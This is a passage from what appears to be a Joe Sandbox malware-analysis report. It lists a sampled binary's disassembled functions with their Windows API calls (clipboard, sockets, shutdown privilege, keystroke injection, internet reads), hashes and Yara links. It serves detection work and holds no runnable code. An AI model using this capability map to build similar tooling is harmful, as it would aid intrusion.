                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00EA44E2
                                                                                                          • LockResource.KERNEL32(?), ref: 00EA44EE
                                                                                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00EA454F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 1433390588-0
                                                                                                          • Opcode ID: 555e9674bac719a1e0fa201b6b9967efe3e35c56af22f65e2ccf33d822e10f2b
                                                                                                          • Instruction ID: 8dcd23394a79e1a05d7abb2cf26d1f447e9444541661cdd9beb57175d3426083
                                                                                                          • Opcode Fuzzy Hash: 555e9674bac719a1e0fa201b6b9967efe3e35c56af22f65e2ccf33d822e10f2b
                                                                                                          • Instruction Fuzzy Hash: F131C1B190221AAFCB119FA1EC58ABF7BA8FF49344F044426F951FA191D770EA11CB60
                                                                                                          Function 00EB4830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1737998785-0
                                                                                                          • Opcode ID: 1e6e5b73288b99e596b6a8035bfb3d20e8cefb37bd03e956abdd6e788e1fc494
                                                                                                          • Instruction ID: 92aa5c0a33a03de673af98467e7040a239a9c6ecbad39c777bf0fcfef07bf557
                                                                                                          • Opcode Fuzzy Hash: 1e6e5b73288b99e596b6a8035bfb3d20e8cefb37bd03e956abdd6e788e1fc494
                                                                                                          • Instruction Fuzzy Hash: 90218371702211AFDB15AF61FC49F6E7BA8EF84711F04805AF955BB2A2DB31ED008B94
                                                                                                          Function 00EAFA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00EAFA83
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00EAFB96
                                                                                                            • Part of subcall function 00E452B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E452E6
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00EAFAB3
                                                                                                          • _wcscmp.LIBCMT ref: 00EAFAC7
                                                                                                          • _wcscmp.LIBCMT ref: 00EAFAE2
                                                                                                          • FindNextFileW.KERNEL32(?,?), ref: 00EAFB80
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 2185952417-438819550
                                                                                                          • Opcode ID: 46e65a2c787833965db459144b39cc558cb1896654af9197d4fd74a466cca42a
                                                                                                          • Instruction ID: 4d0ed483fff3d513113ffc9e10600285a6375556ddde40b6a3fac768c954e4c0
                                                                                                          • Opcode Fuzzy Hash: 46e65a2c787833965db459144b39cc558cb1896654af9197d4fd74a466cca42a
                                                                                                          • Instruction Fuzzy Hash: 0F419071D4120A9FCF14DFA4CC55AEEBBB4FF09351F145566E814B62A1EB30AE48CB60
                                                                                                          Function 00EA5778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E99399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E993E3
                                                                                                            • Part of subcall function 00E99399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E99410
                                                                                                            • Part of subcall function 00E99399: GetLastError.KERNEL32 ref: 00E9941D
                                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00EA57B4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                          • String ID: $@$SeShutdownPrivilege
                                                                                                          • API String ID: 2234035333-194228
                                                                                                          • Opcode ID: 58487948c2be2336107472c68b33d07be3f04edd9a602f81f74c4142807ad04f
                                                                                                          • Instruction ID: 17f77c342c6d44a4b21b949c1399302f06bc626f639142744218b01d1f0ecaf6
                                                                                                          • Opcode Fuzzy Hash: 58487948c2be2336107472c68b33d07be3f04edd9a602f81f74c4142807ad04f
                                                                                                          • Instruction Fuzzy Hash: 8D01D433651712EEE728A264EC8ABBA7698EB0A744F24252BFD13FA0D2DA507C008550
                                                                                                          Function 00EB696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00EB69C7
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00EB69D6
                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00EB69F2
                                                                                                          • listen.WSOCK32(00000000,00000005), ref: 00EB6A01
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00EB6A1B
                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00EB6A2F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279440585-0
                                                                                                          • Opcode ID: 4f31da9d2d4924ea755d4d2f51a08ddba22858a1fd01af853f057b292500f8ba
                                                                                                          • Instruction ID: c05f1c0539f8ef7ac8b20e79358acbd16170346a0fbb6c28b90fc1a7a77d4f33
                                                                                                          • Opcode Fuzzy Hash: 4f31da9d2d4924ea755d4d2f51a08ddba22858a1fd01af853f057b292500f8ba
                                                                                                          • Instruction Fuzzy Hash: 9D21CE756002009FCB00EF64E989BAEB7E9EF44724F14955AF956BB3E1CB30AD05CB90
                                                                                                          Function 00E41663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
                                                                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E41DD6
                                                                                                          • GetSysColor.USER32(0000000F), ref: 00E41E2A
                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00E41E3D
                                                                                                            • Part of subcall function 00E4166C: DefDlgProcW.USER32(?,00000020,?), ref: 00E416B4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ColorProc$LongWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3744519093-0
                                                                                                          • Opcode ID: 25768e8d016fe6e80d33cc269d92c851162855e5662d1525c6a4ef8d7fb75480
                                                                                                          • Instruction ID: ed38253c54438bbbf0cf94c89ce232494e7ea9a1368732465539cb0b5bb8750d
                                                                                                          • Opcode Fuzzy Hash: 25768e8d016fe6e80d33cc269d92c851162855e5662d1525c6a4ef8d7fb75480
                                                                                                          • Instruction Fuzzy Hash: 46A157B4509604BAEE38AB29BC49FBB35DDDF4130AF25B18EF506F5181CB219C82D275
                                                                                                          Function 00EAC2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EAC329
                                                                                                          • _wcscmp.LIBCMT ref: 00EAC359
                                                                                                          • _wcscmp.LIBCMT ref: 00EAC36E
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00EAC37F
                                                                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00EAC3AF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                          • String ID:
                                                                                                          • API String ID: 2387731787-0
                                                                                                          • Opcode ID: 506ff1d39ac3c3300187b714a31621f9949f7a05b65cd89a0f3adfb3b072da84
                                                                                                          • Instruction ID: 1527d064cc048c3133a3a38ac3615419ee747e860c125cd0384dd382a9307493
                                                                                                          • Opcode Fuzzy Hash: 506ff1d39ac3c3300187b714a31621f9949f7a05b65cd89a0f3adfb3b072da84
                                                                                                          • Instruction Fuzzy Hash: 30519C75A046028FC714DF68D490EAAB7E4EF4E314F20565DE966AB3A1DB30BD08CB91
                                                                                                          Function 00EB6E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EB8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00EB84A0
                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00EB6E89
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00EB6EB2
                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00EB6EEB
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00EB6EF8
                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00EB6F0C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 99427753-0
                                                                                                          • Opcode ID: 1a376eee5274695e731784e5b9c116cc9f837c1cc9eb4a7e05fba7f4c22aa3e2
                                                                                                          • Instruction ID: 967e5e29d295783cd85de0774eb144d719575a5e8ba0af74567ec9ae77be56be
                                                                                                          • Opcode Fuzzy Hash: 1a376eee5274695e731784e5b9c116cc9f837c1cc9eb4a7e05fba7f4c22aa3e2
                                                                                                          • Instruction Fuzzy Hash: 8941D0B6B00200AFDB10AF64EC86F7E77E8DB44714F049459FA56BB3D2DA749D008BA1
                                                                                                          Function 00EC59B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                          • String ID:
                                                                                                          • API String ID: 292994002-0
                                                                                                          • Opcode ID: 9a5ca5678412448528c67a1f382c2467e64e83c4c29f97b9550b796325b29760
                                                                                                          • Instruction ID: bb010b7dc35e1ad7dcf8c3aa0a7225e218c49f08249efd5a4b2b1fbfd2782b37
                                                                                                          • Opcode Fuzzy Hash: 9a5ca5678412448528c67a1f382c2467e64e83c4c29f97b9550b796325b29760
                                                                                                          • Instruction Fuzzy Hash: 0B1104737019119FE7212F27AD84F6E7B98EF84720F04612EF846F7241CB31E9428AA0
                                                                                                          Function 00E80030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LocalTime__swprintf
                                                                                                          • String ID: %.3d$WIN_XPe
                                                                                                          • API String ID: 2070861257-2409531811
                                                                                                          • Opcode ID: c6da3442b616dfd91dfccbb33dcc1db8b006be0af31b4558a74dc2ca4ddd6472
                                                                                                          • Instruction ID: f1403d1350175712646b7cd88471987abf6ee103122c989e8d1a41a457d134b0
                                                                                                          • Opcode Fuzzy Hash: c6da3442b616dfd91dfccbb33dcc1db8b006be0af31b4558a74dc2ca4ddd6472
                                                                                                          • Instruction Fuzzy Hash: 92D01272844108EEC748ABA0DC45EFA737CEB04300F142852F54EB2040E335874C9B22
                                                                                                          Function 00EB29BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00EB1ED6,00000000), ref: 00EB2AAD
                                                                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EB2AE4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 599397726-0
                                                                                                          • Opcode ID: f6b12165ee017718a99e1c3149c5781b85a7ef501d88281c8f1e51aa2464f26d
                                                                                                          • Instruction ID: 49cdcad1fbbf25a9b3672ea8e14f102bf08825f5c94947e458aa41e18b735c64
                                                                                                          • Opcode Fuzzy Hash: f6b12165ee017718a99e1c3149c5781b85a7ef501d88281c8f1e51aa2464f26d
                                                                                                          • Instruction Fuzzy Hash: 8A419271600209BFEB21DE95DC85EFBB7ECEF40758F10506EF705B6141EA71AE419660
                                                                                                          Function 00E99399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E60FE6: std::exception::exception.LIBCMT ref: 00E6101C
                                                                                                            • Part of subcall function 00E60FE6: __CxxThrowException@8.LIBCMT ref: 00E61031
                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E993E3
                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E99410
                                                                                                          • GetLastError.KERNEL32 ref: 00E9941D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                          • String ID:
                                                                                                          • API String ID: 1922334811-0
                                                                                                          • Opcode ID: e1267e7a835508e911653a21c3e19d228a484da761035492ab30a370e6b3ced2
                                                                                                          • Instruction ID: f0280b3f27be1ef9017f636b035af93fcdce2c3b9b5e9f7c5812f1b86ee17d2b
                                                                                                          • Opcode Fuzzy Hash: e1267e7a835508e911653a21c3e19d228a484da761035492ab30a370e6b3ced2
                                                                                                          • Instruction Fuzzy Hash: 4F116DB1514205BFDB28DF58EC85E2BB7F8EB44750B24852EF459A2241EA70AC41CA60
                                                                                                          Function 00EA42D5 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00EA42FF
                                                                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00EA433C
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00EA4345
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 33631002-0
                                                                                                          • Opcode ID: 133723f55accb56c8f5f69b62d5b100ed046ba34ba235a14eb3ec9087f957945
                                                                                                          • Instruction ID: 76cbd2ce0d07829bca72ff65afadfe1e69e9ee5a13bda640a5a53ddf5a9132f5
                                                                                                          • Opcode Fuzzy Hash: 133723f55accb56c8f5f69b62d5b100ed046ba34ba235a14eb3ec9087f957945
                                                                                                          • Instruction Fuzzy Hash: 781182B1901229BFEB109BE99C48FAFBBBCEB49710F040156B914FB190D2B46D0487A1
                                                                                                          Function 00EA4F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00EA4F45
                                                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00EA4F5C
                                                                                                          • FreeSid.ADVAPI32(?), ref: 00EA4F6C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 3429775523-0
                                                                                                          • Opcode ID: 2a6926635341aa24d5bff1a597330137a90625b42d2ee7103c7e8e5b7ff3e008
                                                                                                          • Instruction ID: d87e6f24032cae93b4d7ba118f4a8ac835c4b8232de51359652bb51cdbb70126
                                                                                                          • Opcode Fuzzy Hash: 2a6926635341aa24d5bff1a597330137a90625b42d2ee7103c7e8e5b7ff3e008
                                                                                                          • Instruction Fuzzy Hash: 3DF04975A1130CBFDF00DFE0DC89BAEBBBCEF08201F4048A9A901E2180E7346A088B50
                                                                                                          Function 00EA1AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00EA1B01
                                                                                                          • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00EA1B14
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
